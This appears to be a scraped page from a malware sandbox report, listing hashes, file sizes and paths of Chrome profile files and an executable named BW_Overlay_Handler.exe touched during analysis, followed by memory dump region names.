c7ccc441e5bbe73b3210d2737f471587ea9e0af86a523f635191212a9e82a3289ec8f70b1961897d988e02be277f3fe8514a6eca4b27594910f9350655bb2138

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
707B

MD5
08dc067eca7ed33849c23467a78e1cb5

SHA1
cbfdb641c4fe449e8c192fa9b33d605348287554

SHA256
ab53b2b0a258864e6ebe086e341e7a4823fb23d0c75ea85f9e9e3bc056d65f42

SHA512
03335d191619ecf9507b5553664043c7d4bbd5fdcb647a18fe482be941be2adcf054998fe2e38012752ecd6f9a95fa0b395428bfab751ff62133154dbcabf6d8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
707B

MD5
7b826b7e2bbe36828890403844db06ff

SHA1
f1e0a18d8db46d856fca7bdddc421be116c90ced

SHA256
40c42ae684c9dd49f821fcfbbd55f1f7e081c3ca8c0f4db80e380b99f09b865a

SHA512
914ea809e8d6a6488df2e454b7acbbe6f78421a8a9b42cae5d9fe0676b5d4fae318be73b481393d38826c0698e1f5d1755ba3e36202e3beace4880eebe0362b6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
539B

MD5
afda28397e5c8b6fdc4e643e5dd782e9

SHA1
9af16dad9d9637338a0ef6ce4c975a5d4699d173

SHA256
1a8ca8a5487085c3f634bd7a893da80d697f5590ddd74c4da34f5e5659ad6121

SHA512
4cea1c6b1e18ee1ddda98a7568236136bd80dc65e537c149cfe909ad33795282bae705f1acafee8ff4658abeef09ae5859cc58749cb70b495647714f6d44006d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
4KB

MD5
836cdcb460ebad5198403ce35189350d

SHA1
ce3dd3b5017c2aa38482fc19d92357448044f06a

SHA256
8c81df9bf388df43869960c4356071e127c3e24457aedf104c92a2d2a6eeb8d8

SHA512
cb60a7ba775f5f5366d7e434b89027d2f9fc8c159ee2f739268038effd73eee058712b3d012932f58425c0bbf57842dc738c50eeb6f9fc89a3585fe0da528ef7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
4KB

MD5
037cfc3aa5b9d2b1449341f5a27adfc2

SHA1
2dacaa5c0e1b432b6f57b715c94a0cdba54843e0

SHA256
7711030ead2a50d91db8352e8f5d7b84d403b7ff2fc14bda6a003b7be6e4fbb7

SHA512
3a5758552b481692587f8bb1254529a0d4cc4c8e840ea024cdd9b010bc92bd3018f7c78def2d85364f3149daecd0b768bd99923cb1f1c29b8a480fa93bc1ec5a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
4KB

MD5
287dae2b1d79e0fca3b864b5eeeca6cc

SHA1
84a5c8e80c5fce8d1dfec7544d174c4964047caf

SHA256
c2d8b3c2d9e3bea5d50b57d418706302fd8bf6defcd2015158b0cc61d1bfb4f8

SHA512
ecc88b4f376fbc57c675ac14da6e2fb8a85699e6128fface9ab72b3fa82c9f1072106ad221599f04a896275805c022b6a7b1c527fc23c687ba51713ce001edad

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
8cd979077acf32ba9e1ac4445fca46b6

SHA1
507bd8ff51ab6e57a51b246bec55f8748091bd72

SHA256
e28fb064067cb863c67199e8f9ee447a6fb05431be02ed11c1faa4609e722549

SHA512
762287c1fbf97863b1fc9a9860b9ff506caeb3f9409a5134b337e782fbeb22df001e36ffe93cef2c2441074d88bd60a7e18ca82d456f2b1e73d1c7482965c733

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
1b0afea22e13a0ffec94020a7cea91df

SHA1
d886be2222f87fcefdc07df38f41170ac1bdaff5

SHA256
03470e7e7308e731f8e9856e05a2a7a6bae42644adb28de25b9ae9ed135f7dbb

SHA512
1fae3abd0c445913423ab3ed1afddb6a0b10ff49db59e82e2f6a832ec1fc5d55140ef6be82e5cd59b8b8b8a3742ac70a0a9aaa09c5b8b0cdd85c7d31c9f41a73

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
56B

MD5
ae1bccd6831ebfe5ad03b482ee266e4f

SHA1
01f4179f48f1af383b275d7ee338dd160b6f558a

SHA256
1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649

SHA512
baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe586cee.TMP

Filesize
120B

MD5
176db124b4b0d73e5ee44578bc907164

SHA1
2ec2a6959cc2034c368c88f6f06788e75c1a1358

SHA256
974e6a6f11c593a65884b06db3636ce57c42ad5b5cf59a2306d96e715e2e5d86

SHA512
8265d3dac57e4a41080b524bb6999c446589cdfa2ccc7a9cd8c2538af714811b47c7a52f606ebb33a2cca3cb9519e0c6a75bcf68f4c2add69c84d43e99bfe944

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
153KB

MD5
85b27bfa69a9c8ff013d99f9e1d3628f

SHA1
4f6a86ae701a694679e3ae3f56c3dc2e5f8f05ad

SHA256
baa0c39540e69ea2475446f925842ff7674cc1cdc8714cf0b4d387ea8fc97d4e

SHA512
2d819944818fee83ca081bbdfe09b2acf9f102bdcaca94c9b55618e1f7ae7ce7ec16ca0ae86778590bc41309b557af68abd7dddb4163c2e303f9d0a6e3a8cc73

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
153KB

MD5
00302bf7759c0c750fe541c53b9757ea

SHA1
6feaffe54e0d4e27ef9f301397c98eb8e16e02a7

SHA256
5c33853bcf93a2c361fd96f30fa70ae9487d3263e170924607b3e0585dca52aa

SHA512
3a409cf7012cae5e40e2e3695927d46661762a24f092cd8c18a6d774563b89f6e9b588b7ab0a93d4699cd32d525093af347d96c9398952c618345c34dd6d91fc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
153KB

MD5
95a578a8b6c30199e139b1ab37135bce

SHA1
2c64622be7600fa7312077a6684780b2cf4da335

SHA256
619df921f07273108bdac0d80002e79cac05ec99bbf292681da2d9f194b676db

SHA512
664a51fb149f4f95802f0434f6dae1e7930043e99719669a019bbe47a042c6c04d0feecee70e18208ae6367fb80dd94e0351250cc6e9e12c8095f4a0d4910f69

Download Submit
C:\Windows\Media\BW_Overlay_Handler.exe

Filesize
37KB

MD5
2838c9120aea6d9faac4b3e919bfa5a5

SHA1
84453ad645d21ac3de7aefd40f189f8e1aa85a48

SHA256
8a4f7dd54a0d8582e6e58f7741566999efc69a0693ce14a7627ee9c5c6e54dad

SHA512
0c93f6da7b6cb4af6cbb41be11b50736983e348bcdbba33fdd62065b369f12f7549002abf1bf84b0a061ab0a64aae9e3e8293315086e1c1eb45d312b840c13c0

Download Submit
C:\Windows\Media\BW_Overlay_Handler.exe

Filesize
37KB

MD5
2838c9120aea6d9faac4b3e919bfa5a5

SHA1
84453ad645d21ac3de7aefd40f189f8e1aa85a48

SHA256
8a4f7dd54a0d8582e6e58f7741566999efc69a0693ce14a7627ee9c5c6e54dad

SHA512
0c93f6da7b6cb4af6cbb41be11b50736983e348bcdbba33fdd62065b369f12f7549002abf1bf84b0a061ab0a64aae9e3e8293315086e1c1eb45d312b840c13c0

Download Submit
memory/2784-152-0x0000020CB2F60000-0x0000020CB2F61000-memory.dmp

Filesize
4KB

Download
memory/2784-151-0x0000020CB2F60000-0x0000020CB2F61000-memory.dmp

Filesize
4KB

Download
memory/2784-143-0x0000020CB2F60000-0x0000020CB2F61000-memory.dmp

Filesize
4KB

Download
memory/2784-144-0x0000020CB2F60000-0x0000020CB2F61000-memory.dmp

Filesize
4KB

Download
memory/2784-145-0x0000020CB2F60000-0x0000020CB2F61000-memory.dmp

Filesize
4KB

Download
memory/2784-154-0x0000020CB2F60000-0x0000020CB2F61000-memory.dmp

Filesize
4KB

Download
memory/2784-155-0x0000020CB2F60000-0x0000020CB2F61000-memory.dmp

Filesize
4KB

Download
memory/2784-153-0x0000020CB2F60000-0x0000020CB2F61000-memory.dmp

Filesize
4KB

Download
memory/2784-149-0x0000020CB2F60000-0x0000020CB2F61000-memory.dmp

Filesize
4KB

Download
memory/2784-150-0x0000020CB2F60000-0x0000020CB2F61000-memory.dmp

Filesize
4KB

Download
memory/3968-133-0x00007FF92A530000-0x00007FF92A532000-memory.dmp

Filesize
8KB

Download
memory/3968-135-0x00007FF6F5FE0000-0x00007FF6F69AD000-memory.dmp

Filesize
9.8MB

Download
memory/3968-134-0x00007FF92A540000-0x00007FF92A542000-memory.dmp

Filesize
8KB

Download
memory/4980-378-0x000001FB45020000-0x000001FB45021000-memory.dmp

Filesize
4KB

Download
memory/4980-379-0x000001FB45020000-0x000001FB45021000-memory.dmp

Filesize
4KB

Download
memory/4980-380-0x000001FB45020000-0x000001FB45021000-memory.dmp

Filesize
4KB

Download
memory/4980-377-0x000001FB45020000-0x000001FB45021000-memory.dmp

Filesize
4KB

Download
memory/4980-376-0x000001FB45020000-0x000001FB45021000-memory.dmp

Filesize
4KB

Download
memory/4980-375-0x000001FB45020000-0x000001FB45021000-memory.dmp

Filesize
4KB

Download
memory/4980-370-0x000001FB45020000-0x000001FB45021000-memory.dmp

Filesize
4KB

Download
memory/4980-368-0x000001FB45020000-0x000001FB45021000-memory.dmp

Filesize
4KB

Download
memory/4980-369-0x000001FB45020000-0x000001FB45021000-memory.dmp

Filesize
4KB

Download